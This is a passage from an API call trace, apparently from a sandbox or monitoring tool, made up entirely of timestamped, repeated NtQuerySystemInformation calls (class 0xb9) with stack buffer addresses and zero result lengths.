SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0188.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0188.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0188.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0188.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0188.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0188.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0188.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0188.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0188.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0188.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0188.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0188.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0188.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0188.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0188.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0188.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0188.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0188.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0188.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0188.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0189.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0189.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0189.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0189.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0189.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0189.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 